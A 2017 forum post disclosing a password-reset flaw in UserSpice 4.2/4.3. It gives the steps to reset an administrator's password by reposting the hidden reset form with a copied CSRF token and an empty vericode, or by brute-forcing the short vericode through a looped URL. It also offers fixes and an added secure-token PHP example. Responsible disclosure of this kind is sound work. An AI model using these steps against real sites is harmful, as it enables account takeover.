
danger: us4.2, us4.3 hackable easily
I was testing email verification on my server, and found that the UserSpice system can be easily hacked by knowing ONLY the e-mail.
Just tested on the latest 4.3 beta. Any user that knows the UserSpice code or any foreign hacker may easily hack the system by simply revealing the hidden form on:
Code:
http://localhost/us43/users/forgot_password_reset.php
(you can get form code from userspice files or just register a legit user and reset password to copy it)

So insert form code:
<div class="row">
<div class="col-xs-12">
<h2 class="text-center">Hello <?=$ruser->data()->fname;?>,</h2>
<p class="text-center">Please reset your password.</p>
<form action="forgot_password_reset.php?reset=1" method="post">
<?php if(!$errors=='') {?><div class="alert alert-danger"><?=display_errors($errors);?></div><?php } ?>
<div class="form-group">
<label for="password">New Password:</label>
<input type="password" name="password" value="" id="password" class="form-control">
</div>
<div class="form-group">
<label for="confirm">Confirm Password:</label>
<input type="password" name="confirm" value="" id="confirm" class="form-control">
</div>
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe">
<input type="hidden" name="email" value="userspicephp@gmail.com">
<input type="hidden" name="vericode" value="">
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">
</form>
<br />

fill data in form:
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe"> - get this on the registration page
<input type="hidden" name="email" value="userspicephp@gmail.com"> - default e-mail; if you know the admin e-mail, that's it
<input type="hidden" name="vericode" value=""> - VERICODE IGNORED
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">

- now you can use this form to reset the administrator's password.
1) The csrf token is useless in this case and can be copied from the registration page
2) Vericode is completely ignored - add a check!
3) Vericode is extremely short and insecure! - this means even if you add a vericode check for this form it will still be easily hackable with a script! (you will need less than 1 second to guess the vericode with brute force) and then it's done

you just need to set up this URL:
Code:
http://localhost/users/forgot_password_reset.php?email=userspicephp%40gmail.com&vericode=0&reset=1
and loop vericode from 0 to 999999

My suggestions:
vericode should be like a token, make it LONG
That's how I craft my vericode (example):
Code:
public static function getVericode(){
    return bin2hex(random_bytes(32));
}

Make sure you generate a new vericode on every action like:
password reset, verify email, user creation, etc.

so a new solid vericode before every action, so on password reset you generate a NEW vericode, store it in the db and send it - that should be done when the user presses the "reset" button

This shows that you do not check user input data. Keep in mind that users can put anything they want into an HTML page; they can also craft any POST and GET request. You just need to add solid validation to the PHP.

Thanks!
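Added example (editor's code, not UserSpice's) of the token handling the post above suggests: a long random vericode issued when the user presses "reset", stored only as a hash with an expiry, rejected when empty or malformed, compared in constant time, and consumed on first use. The $store array standing in for the users table and the function names are assumptions.

```php
<?php
// Added example, not UserSpice code. $store stands in for the users table
// (assumption): $store[$email] = ['vericode_hash' => ..., 'vericode_expires' => ...].

const VERICODE_TTL = 3600; // seconds a reset token stays valid

// Issue a fresh 256-bit token when the user presses "reset". Only its hash is
// stored; the raw token is what goes into the e-mailed link.
function issueResetToken(array &$store, string $email): ?string {
    if (!isset($store[$email])) {
        return null; // caller should respond identically for unknown accounts
    }
    $token = bin2hex(random_bytes(32));
    $store[$email]['vericode_hash'] = hash('sha256', $token);
    $store[$email]['vericode_expires'] = time() + VERICODE_TTL;
    return $token;
}

// Validate the POSTed email + vericode before the password is touched.
// Returns true only for a non-empty, well-formed, unexpired, matching token.
function verifyResetToken(array &$store, string $email, string $token): bool {
    if ($token === '' || strlen($token) !== 64 || !ctype_xdigit($token)) {
        return false; // empty or malformed vericode (the case the post describes)
    }
    $row = $store[$email] ?? null;
    if ($row === null || empty($row['vericode_hash'])) {
        return false; // no outstanding reset for this account
    }
    if ($row['vericode_expires'] < time()) {
        return false; // expired token
    }
    if (!hash_equals($row['vericode_hash'], hash('sha256', $token))) {
        return false; // constant-time mismatch
    }
    // One-time use: clear the stored hash so the link cannot be replayed
    $store[$email]['vericode_hash'] = null;
    $store[$email]['vericode_expires'] = 0;
    return true;
}

// Demo with a constructed store and a constructed admin address
$store = ['admin@example.com' => ['vericode_hash' => null, 'vericode_expires' => 0]];
$token = issueResetToken($store, 'admin@example.com');
var_dump(verifyResetToken($store, 'admin@example.com', ''));     // empty vericode
var_dump(verifyResetToken($store, 'admin@example.com', '0'));    // short guessed vericode
var_dump(verifyResetToken($store, 'admin@example.com', $token)); // the e-mailed token
var_dump(verifyResetToken($store, 'admin@example.com', $token)); // same token reused
```

The password update itself would run only after verifyResetToken() returns true, using the e-mail from the stored row rather than trusting the hidden form field.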


Messages In This Thread
danger: us4.2, us4.3 hackable easily - by SavageStyle - 11-05-2017, 02:50 PM
danger: us4.2, us4.3 hackable easily - by Brandin - 11-05-2017, 06:21 PM
danger: us4.2, us4.3 hackable easily - by mudmin - 11-06-2017, 01:12 PM
danger: us4.2, us4.3 hackable easily - by mudmin - 11-12-2017, 12:59 PM